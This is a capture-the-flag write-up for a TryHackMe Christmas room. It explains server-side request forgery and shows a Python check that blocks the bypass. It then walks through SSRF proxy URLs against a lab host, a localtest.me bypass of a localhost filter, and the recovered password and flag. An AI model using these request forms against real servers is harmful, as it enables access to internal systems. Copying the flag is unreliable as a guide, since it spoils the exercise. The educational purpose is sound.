# The Naughty or Nice List

## Video

{% embed url="https://www.youtube.com/watch?v=XgJ_6xdspKM" %}

## Resources

### Server-Side Request Forgery

Server-Side Request Forgery (SSRF) is a web app vulnerability that allows attackers to force the web application server to make requests to resources it normally wouldn't. For example, a web app may have the functionality to produce screenshots of other websites when a user supplies a URL. This is perfectly valid functionality; however, URLs can also be built for internal IP addresses (e.g. 192.168.1.1, 10.10.10.10, 127.0.0.1 etc.) as well as internal-only hostnames (e.g. localhost, WIN2019SERV.CORP). If a web developer is not careful, an attacker could provide the app with these and manage to screenshot internal resources, which often have fewer protections.

To counter this, user-provided URLs can be checked before they are requested, to ensure that malicious values are not being used. However, due to the complex nature of URLs themselves, there are often many things an attacker can do to bypass these checks.

Note that while the example of SSRF used in this task is effectively a Remote File Inclusion (RFI) vulnerability as well, not every SSRF is. Some SSRF vulnerabilities only trigger a DNS lookup, while others may not return any kind of response to the web app, but can still be used to "port scan" internal systems by measuring the time each request takes to complete. In other cases, SSRF may be used as a form of Denial of Service (DoS) since the attacker can continually request that the server download large files simultaneously (taking up memory, disk space, and network bandwidth).
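The filter-bypass problem described above, as an added example that is not code from the TryHackMe room or this write-up: a naive hostname blocklist of the kind that can be bypassed with an alias such as list.hohoho.localtest.me, beside a check that resolves the host and rejects anything landing on a loopback or private address. The resolver is a constructed stub table so the script runs offline (real code would call socket.getaddrinfo); the mapping of list.hohoho to loopback is an assumption.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed stub resolver standing in for DNS. In real DNS, *.localtest.me
# resolves to 127.0.0.1; the list.hohoho and example.com entries are assumed.
STUB_DNS = {
    "list.hohoho": "127.0.0.1",
    "list.hohoho.localtest.me": "127.0.0.1",
    "localhost": "127.0.0.1",
    "example.com": "93.184.216.34",
}

# Hostnames the naive filter knows about; anything else is waved through.
BLOCKED_NAMES = {"localhost", "list.hohoho"}


def naive_allows(url: str) -> bool:
    """String-match blocklist: rejects only hostnames it has seen before."""
    host = urlsplit(url).hostname or ""
    return host not in BLOCKED_NAMES


def hardened_allows(url: str, allowed_schemes=("http", "https")) -> bool:
    """Resolve the host and allow only globally routable addresses.

    Fails closed on unknown schemes, missing hosts and unresolvable names.
    Note: a production check must also pin the resolved address for the
    actual fetch, otherwise DNS rebinding between check and use remains.
    """
    parts = urlsplit(url)
    if parts.scheme not in allowed_schemes or not parts.hostname:
        return False
    try:
        # Literal IP in the URL (covers 127.0.0.1, 10.x, fe80:: and so on).
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        resolved = STUB_DNS.get(parts.hostname)
        if resolved is None:
            return False
        addr = ipaddress.ip_address(resolved)
    # is_global is False for loopback, private, link-local and reserved ranges.
    return addr.is_global


if __name__ == "__main__":
    for u in ("http://list.hohoho:8080/search.php?name=Shell5",
              "http://list.hohoho.localtest.me", "http://example.com/"):
        print(u, "naive:", naive_allows(u), "hardened:", hardened_allows(u))
```

The alias passes the naive check and fails the hardened one because the decision is made on the resolved address rather than on the hostname string.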

## Challenge

### What is Santa's password?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwHeB2zPxXHFdUmL77%2F-MOwIcUbhoNaJeEP1NOO%2Fimage.png?alt=media\&token=b6651516-8364-452c-a50c-d0e61e758d74)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3DShell5>

{% embed url="https://meyerweb.com/eric/tools/dencoder/" %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwIeKc8QRcs3KI-A2l%2F-MOwJ7ipiq8iMhhnoHoo%2Fimage.png?alt=media\&token=831d3dba-17b2-4aaa-a449-8f22df8b54b5)

> <http://10.10.129.132/?proxy=http://list.hohoho:8080/search.php?name=Shell5>

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2F>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwJMzHAsHKNzeF7AER%2F-MOwJwcnWqSDz53ZHmW8%2Fimage.png?alt=media\&token=d5faae50-de71-4588-b54d-0c5313310a77)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A80>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwJMzHAsHKNzeF7AER%2F-MOwKEa6lq09GDnLQUz5%2Fimage.png?alt=media\&token=11cab858-385d-4876-9c9e-017e17daeaa7)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A80>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwKGcG9KK333ANfRAL%2F-MOwKPEsU7hTMD_lqEmn%2Fimage.png?alt=media\&token=1a255e09-9eaf-458f-95b7-f912dda42816)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flocalhost>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwKVQ780-oOjZFbKwx%2F-MOwKl6bV4SGwQGdGdF-%2Fimage.png?alt=media\&token=52c3597d-d0e4-454d-83b9-a09baef5d3ec)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho.localtest.me>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwL1UVIpQERQPUuunE%2F-MOwLPa7tv2e7KmHqPf8%2Fimage.png?alt=media\&token=ab3e240e-6797-4e42-bf12-56ac3ac1d69f)

{% hint style="success" %}
Be good for goodness sake!
{% endhint %}

### What is the challenge flag?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwHeB2zPxXHFdUmL77%2F-MOwIMC6nrOi2IU1-PS5%2Fimage.png?alt=media\&token=645526ca-a458-4570-8dfc-031be2d37f9f)

> Login: Santa
>
> Password: Be good for goodness sake!

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwLYCYSdtosbcwKkL3%2F-MOwNS4iKzGChlA4m7sS%2Fimage.png?alt=media\&token=69fe5d88-afb5-4c4d-a3e3-c8f6af8245b5)

{% hint style="success" %}
THM{EVERYONE\_GETS\_PRESENTS}
{% endhint %}
